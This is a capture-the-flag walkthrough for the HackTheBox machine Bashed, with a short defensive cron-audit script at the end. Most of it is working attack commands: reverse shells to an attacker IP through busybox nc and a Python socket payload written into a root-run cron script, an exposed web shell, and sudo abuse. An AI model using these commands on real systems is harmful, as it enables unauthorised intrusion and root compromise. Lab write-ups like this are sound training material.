Explore the fundamentals of cybersecurity with Bashed, an easy-level Capture The Flag (CTF) challenge. This straightforward writeup walks through the key concepts with clarity and simplicity, making it accessible to players at this level.

Add Hosts

10.10.10.68 bashed.htb

Script to add the host entry automatically (it is skipped if already present):

ip="10.10.10.68"
domain="bashed.htb"
grep -qF "$ip $domain" /etc/hosts || echo "$ip $domain" | sudo tee -a /etc/hosts

Mapping

nmap -sCV bashed.htb
Starting Nmap 7.95 ( https://nmap.org ) at 2024-09-27 22:23 CEST
Nmap scan report for bashed.htb (10.10.10.68)
Host is up (0.051s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site

Directory Discovery

Start by using dirb to scan for directories on Bashed HTB:

dirb http://bashed.htb/

The scan reveals the following directories:

==> DIRECTORY: http://bashed.htb/css/
==> DIRECTORY: http://bashed.htb/dev/
==> DIRECTORY: http://bashed.htb/fonts/
==> DIRECTORY: http://bashed.htb/images/
+ http://bashed.htb/index.html (CODE:200|SIZE:7743)
==> DIRECTORY: http://bashed.htb/js/
==> DIRECTORY: http://bashed.htb/php/

Getting a Shell

1. Discover the PHP Bash Web Shell

  • In one of the directories found by dirb, a PHP Bash web shell is exposed; it runs shell commands from the browser as the web server's user and is the initial foothold.

2. Retrieve the User Flag

  • Once inside the PHP Bash web shell, retrieve the arrexel user flag:
cat /home/arrexel/user.txt

3. Check Sudo Privileges

  • After gaining access, check the sudo privileges for the current user:
sudo -l
  • The output reveals:
(scriptmanager : scriptmanager) NOPASSWD: ALL

This means you can execute any command as the scriptmanager user without a password.

4. Find Readable Directories for scriptmanager

  • Locate directories owned by scriptmanager (and readable by the current user) by running:
find / -type d -readable -user scriptmanager 2>/dev/null | grep -v '^/proc\|^/run\|^/sys'

This command lists the readable directories owned by scriptmanager, excluding the virtual filesystems /proc, /run and /sys; errors from paths the current user cannot enter are discarded.

5. Set Up a Reverse Shell Listener

  • On your attacking machine, set up a listener to catch the reverse shell:
nc -lvnp 9001

6. Initiate a Reverse Shell Using BusyBox

  • The nc (netcat) available on the target is netcat-openbsd, which lacks the -e option, so use BusyBox's nc to get a reverse shell instead. On the target machine, execute:
busybox nc 10.10.14.9 9001 -e /bin/bash

This command establishes a reverse shell connection to your listener on port 9001.

Get an Interactive Shell

Once the reverse shell connects, upgrade it to a fully interactive TTY:

python3 -c 'import pty;pty.spawn("/bin/bash")'

Press Ctrl+Z to background the shell, then run:

stty size; stty raw -echo; fg

As the last step, set the terminal environment:

export TERM=xterm

Monitor Processes with pspy

Objective: Use pspy to monitor processes without needing root privileges and identify processes being executed by root that may be exploitable.

Step 1: Download pspy

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64
chmod +x pspy64

Step 2: Transfer pspy to the Target Server Using Python HTTP Server

  • On your attacking machine, start a Python HTTP server in the directory where pspy64 is located:
python3 -m http.server 8080
  • On the target machine, download pspy64 using wget:
wget http://<vpn-ip>:8080/pspy64 -O /tmp/pspy64
chmod +x /tmp/pspy64

Step 3: Run pspy to Monitor Processes

  • Now that pspy64 is on the target machine, run it to monitor running processes:
/tmp/pspy64
  • While monitoring, pspy may show processes that are periodically executed by root. For example:
2024/09/27 14:02:01 CMD: UID=0     PID=1249   | python test.py
  • This shows that test.py is executed by root, which could be exploited by modifying the script.

1. Switch to scriptmanager User

  • Since test.py is owned by scriptmanager, switch to that user with the sudo rule found earlier:
sudo -u scriptmanager bash

2. Edit test.py

  • Navigate to the location of test.py, which was identified by pspy, and edit the script to include a Python reverse shell payload:
nano /scripts/test.py
  • Replace the contents of test.py with the following reverse shell code:

Replace <vpn-ip> with your actual VPN IP to receive the connection.

import socket, os, pty
s = socket.socket(); s.connect(("<vpn-ip>", 9002))
for fd in (0, 1, 2): os.dup2(s.fileno(), fd)
pty.spawn("/bin/bash")

3. Set up a Listener

  • On your attacking machine, set up a listener to capture the reverse shell:
nc -lvnp 9002

4. Wait for Execution

  • The test.py script is executed periodically by root, as observed in pspy. Wait for the next execution, and the reverse shell should connect to your listener.

5. Capture Root Access

  • Once the reverse shell connects, you should have a shell as root. You can verify this by checking the user and reading sensitive files:
cat /root/root.txt
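The root path on Bashed exists because root periodically runs a script that another user owns. As an added defender's check (not code from the original writeup or from pspy), the audit below scans /etc/crontab-style entries for root-run scripts whose file or directory is owned or writable by a non-root user; the crontab lines and file metadata in SAMPLE_CRON and SAMPLE_META are constructed sample input that mirrors the box, and the default metadata lookup uses os.lstat on a real host.

```python
"""Audit root cron jobs for scripts a non-root user could rewrite. Added example,
not code from the page or pspy: the Bashed finding (root periodically runs
/scripts/test.py, owned by scriptmanager) recast as a defender's check."""
import os, shlex, stat

INTERPRETERS = {"python", "python2", "python3", "bash", "sh", "perl", "php"}

def script_from_command(command):   # absolute path of the script cron runs, or None
    cwd = "/"
    for part in command.replace("&&", ";").split(";"):
        argv = shlex.split(part)
        if argv[:1] == ["cd"] and len(argv) > 1:   # 'cd /scripts && python test.py'
            cwd = argv[1]
            continue
        if argv and os.path.basename(argv[0]) in INTERPRETERS:
            argv = [a for a in argv[1:] if not a.startswith("-")]   # drop options
        elif not argv or "/" not in argv[0]:
            return None          # empty, or a bare command resolved via PATH
        return os.path.normpath(os.path.join(cwd, argv[0])) if argv else None

def weaknesses(script, meta):
    """Ways a non-root user could change what root will execute."""
    found = []
    for p in (script, os.path.dirname(script)):      # the file and its directory
        uid, mode = meta(p)
        if uid != 0:
            found.append(f"{p}: owned by uid {uid}, not root")
        if mode & (stat.S_IWGRP | stat.S_IWOTH):
            found.append(f"{p}: group/world-writable ({stat.filemode(mode)})")
    return found

def audit_crontab(lines, meta=lambda p: (os.lstat(p).st_uid, os.lstat(p).st_mode)):
    """Map each root-run script in /etc/crontab-style lines to its weaknesses."""
    report = {}
    for line in lines:
        fields = line.split(None, 6)                 # m h dom mon dow user command
        if line.startswith("#") or len(fields) < 7 or fields[5] != "root":
            continue
        script = script_from_command(fields[6])
        if script and (issues := weaknesses(script, meta)):
            report[script] = issues
    return report

SAMPLE_CRON = ["*  * * * * root cd /scripts && python test.py",   # constructed; first
               "30 2 * * * root bash /opt/cleanup.sh"]            # entry mirrors pspy
SAMPLE_META = {   # constructed path -> (uid, mode), as os.lstat would report them
    "/scripts": (1001, 0o40755), "/scripts/test.py": (1001, 0o100644),
    "/opt": (0, 0o40755), "/opt/cleanup.sh": (0, 0o100777),
}
```

Run it with audit_crontab(SAMPLE_CRON, SAMPLE_META.__getitem__) to see both findings; on a real host pass the lines of /etc/crontab (and the files under /etc/cron.d) and omit the second argument.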